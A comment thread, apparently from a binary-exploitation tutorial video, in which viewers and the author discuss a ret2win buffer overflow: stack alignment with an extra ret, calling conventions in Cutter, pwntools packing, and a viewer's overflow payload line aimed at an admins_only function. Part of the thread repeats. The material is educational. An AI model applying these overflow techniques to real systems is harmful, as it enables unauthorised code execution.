You are literally the best at explaining this! I've been going through tutorials and none have address the stack alignment issue. This has finally solved issues I've been stuck on for weeks. I wish I could give you more likes.
Very helpful! Please keep doing more of this binary exploitation / reverse engineering stuff... and even if u can do some forensics stuff that will be awesome! Anyway, thanks
why are you SO AWESOME i've been looking EVERYWHERE for someone to explain stack addressing, and nobody did it as perfect and precise and short as YOU.THNAK YOUUUU
your explanations are very very good! Towards the end when you mentioned about padding an extra 'ret' to the stack (by overwriting the stack using buffer overflow vulnerability), I assume this extra return instruction's address is popped so code execution will begin at that address, which is just another return instruction. Once this executes, it will pop the stack again and direct code execution to the admins_only function. Is that right? By the way, it seems like with PIE disabled, ASLR still applies to other non-text segments. Also, is there a way to tell if the stack is 16-byte aligned, or is this 'ret' padding method a technique that may or may not work? Thank you!
Thank you :) The extra ret instruction has no effect from the operational point of view, it just aligns some stuff within the stack frames. It is usually needed in ubuntu 18.04, give to the MOVAPS issue (which I briefly speak about in the ROP video)
I am loving this series! This one really had me lost though. There is something I would like to ask. Even though in this case it is obvious (as s1 is the only variable in general function) how do you easily realize that scanf is writing its output there? More specifically on disassembly view, as in decompiled views it is easy to find. Essentially I would like to understand how to recognize on disassembly when a function writes to a variable, of course you don't have to answer this yourself, with pointing me into some docs for it should be enough, I can RTFM hahaha. Thanks in advance! Will try to complete the next chapter alone, this one was a no go xD
Hi there! Thank you for your kind words. Will continue the series pretty soon (I've been taking a break recently). Answering your question, there are 3 things we have to take into account: 1. We are dealing with a 64bit binary. That is, arguments are passed via registers and not via stack. (You can google about how parameters are passed to functions in 32-bit and 64-bit architectues in assembly). 2. We are dealing with a Linux binary, so we have to take into account the naming convention (en.wikipedia.org/wiki/X86_calling_conventions#List_of_x86_calling_conventions). The first parameter is taken from RDI, the second from RSI, and so forth.... 3. Right before the scanf call at address 0x40132c (6:43), the parameters are being set. If you've never used scanf before, take a look at the man page man7.org/linux/man-pages/man3/scanf.3.html. You will notice the first parameter is the format string (RDI) and the second one is the buffer (RSI). Now taking a look at the assembly code, instruction 0x40131a is setting the RSI register, whose value will be the address of [s1] because of the previous register. And [s1] is rbp-0x20. Cutter does a pretty good job when assigning variable names like s1 to given addresses, but you don't really need them. If you see something like: lea rax, rbp-0x20 mov rsi, rax ... call scanf() You already know the second parameters of scanf will be rbp-0x20. Hope this helps!
@@RazviOverflow Ah, I see, I was making some wrong assumptions there. I am reading on what you mentioned and it is being very informative. Will keep reading about it after work, but I have to say that this info is exactly what I needed, I think I did not knew exactly what to search though, as it seems it was easily reachable :(, so thanks again for pointing me on the right direction. Will keep digging at it :)
Sorry as I am kind of new to using Cutter, but when I use Cutter on my end my theory is that it somehow adds the 0x8 of the ebp to the variable? So instead of it being 0x20 like in the video its 0x28. I say this become my exploit dosen't work if I add the extra padding for the 8 bytes on top of 0x28
Hello, take a look at this question: reverseengineering.stackexchange.com/questions/32317/cutter-shows-addresses-relative-to-stack-but-not-rbp-how-to-change-it
p64() packs a 64bit int (8 bytes), while p32() packs a 32bit int (4 bytes). docs.pwntools.com/en/stable/util/packing.html#pwnlib.util.packing.p32 Depending on the number of bytes you are trying to pack you must use one or the other.
Hey i am getting, stopped with exit code -11 (SIGSEGV) error while trying this example. Welcome admin 😄 [*] Got EOF while reading in interactive i am getting this output but not able to use the shell for anything and "payload = b"A"*0x28 + admins_only_address" is my payload anyway thanks for the help, really helpful videos
You are literally the best at explaining this! I've been going through tutorials and none have address the stack alignment issue. This has finally solved issues I've been stuck on for weeks. I wish I could give you more likes.
Glad I could help :)
Very helpful!
Please keep doing more of this binary exploitation / reverse engineering stuff... and even if u can do some forensics stuff that will be awesome!
Anyway, thanks
Thank you :)
What I like the most is how you explain the theory. Thaks mate.
You are welcome! Glad it helps :)
why are you SO AWESOME
i've been looking EVERYWHERE for someone to explain stack addressing, and nobody did it as perfect and precise and short as YOU.THNAK YOUUUU
You are welcome, glad to help :)
Thanks for the explanation on the MOVAPS issue, been getting it and didn't really understand what was going on.
You are most welcome :)
Incredibly well presented. Don't forget to register Sublime Text!
Thank you! I'm on it, I promise :P
Great video! I learned a lot. It is crazy that you can do things like this lol
Glad you liked it!
your explanations are very very good! Towards the end when you mentioned about padding an extra 'ret' to the stack (by overwriting the stack using buffer overflow vulnerability), I assume this extra return instruction's address is popped so code execution will begin at that address, which is just another return instruction. Once this executes, it will pop the stack again and direct code execution to the admins_only function. Is that right? By the way, it seems like with PIE disabled, ASLR still applies to other non-text segments.
Also, is there a way to tell if the stack is 16-byte aligned, or is this 'ret' padding method a technique that may or may not work? Thank you!
Thank you :)
The extra ret instruction has no effect from the operational point of view, it just aligns some stuff within the stack frames. It is usually needed in ubuntu 18.04, give to the MOVAPS issue (which I briefly speak about in the ROP video)
I am loving this series! This one really had me lost though. There is something I would like to ask. Even though in this case it is obvious (as s1 is the only variable in general function) how do you easily realize that scanf is writing its output there? More specifically on disassembly view, as in decompiled views it is easy to find. Essentially I would like to understand how to recognize on disassembly when a function writes to a variable, of course you don't have to answer this yourself, with pointing me into some docs for it should be enough, I can RTFM hahaha. Thanks in advance! Will try to complete the next chapter alone, this one was a no go xD
Hi there! Thank you for your kind words. Will continue the series pretty soon (I've been taking a break recently). Answering your question, there are 3 things we have to take into account:
1. We are dealing with a 64bit binary. That is, arguments are passed via registers and not via stack. (You can google about how parameters are passed to functions in 32-bit and 64-bit architectues in assembly).
2. We are dealing with a Linux binary, so we have to take into account the naming convention (en.wikipedia.org/wiki/X86_calling_conventions#List_of_x86_calling_conventions). The first parameter is taken from RDI, the second from RSI, and so forth....
3. Right before the scanf call at address 0x40132c (6:43), the parameters are being set. If you've never used scanf before, take a look at the man page man7.org/linux/man-pages/man3/scanf.3.html. You will notice the first parameter is the format string (RDI) and the second one is the buffer (RSI). Now taking a look at the assembly code, instruction 0x40131a is setting the RSI register, whose value will be the address of [s1] because of the previous register. And [s1] is rbp-0x20.
Cutter does a pretty good job when assigning variable names like s1 to given addresses, but you don't really need them. If you see something like:
lea rax, rbp-0x20
mov rsi, rax
...
call scanf()
You already know the second parameters of scanf will be rbp-0x20.
Hope this helps!
@@RazviOverflow Ah, I see, I was making some wrong assumptions there. I am reading on what you mentioned and it is being very informative. Will keep reading about it after work, but I have to say that this info is exactly what I needed, I think I did not knew exactly what to search though, as it seems it was easily reachable :(, so thanks again for pointing me on the right direction. Will keep digging at it :)
@@ilabsentuser Glad to help, and ask whenever you consider!
Nicely done mate !! Top
Thank you :)
Sorry as I am kind of new to using Cutter, but when I use Cutter on my end my theory is that it somehow adds the 0x8 of the ebp to the variable? So instead of it being 0x20 like in the video its 0x28. I say this become my exploit dosen't work if I add the extra padding for the 8 bytes on top of 0x28
Hello, take a look at this question: reverseengineering.stackexchange.com/questions/32317/cutter-shows-addresses-relative-to-stack-but-not-rbp-how-to-change-it
Great video!
Can you say how you install decompiler for cutter?
Thanks
Thank you! The decompiler is installed by default. From their repo I download the AppImage file and simply execute it.
i don't understand why sometimes we use "p64" and others "p32", can you please explain?
p64() packs a 64bit int (8 bytes), while p32() packs a 32bit int (4 bytes). docs.pwntools.com/en/stable/util/packing.html#pwnlib.util.packing.p32
Depending on the number of bytes you are trying to pack you must use one or the other.
great man!!!
Thank you!! Stay tuned, more to come.
What will you do if the flag() address contains bad characters?
In case that happens, you can try jumping to adjacent addresses if they also do the job. Otherwise you'd have to find alternative solutions.
Nicee ✨💯
You are god🙏🙏
Glad to help :)
Hey i am getting, stopped with exit code -11 (SIGSEGV) error while trying this example.
Welcome admin 😄
[*] Got EOF while reading in interactive
i am getting this output but not able to use the shell for anything
and "payload = b"A"*0x28 + admins_only_address" is my payload
anyway thanks for the help, really helpful videos
p64 not working with me ??
whats the alternative for this ?
How is it that p64 does not work? The alternative is using struct, native to python.
This is script kiddie s**t. 😂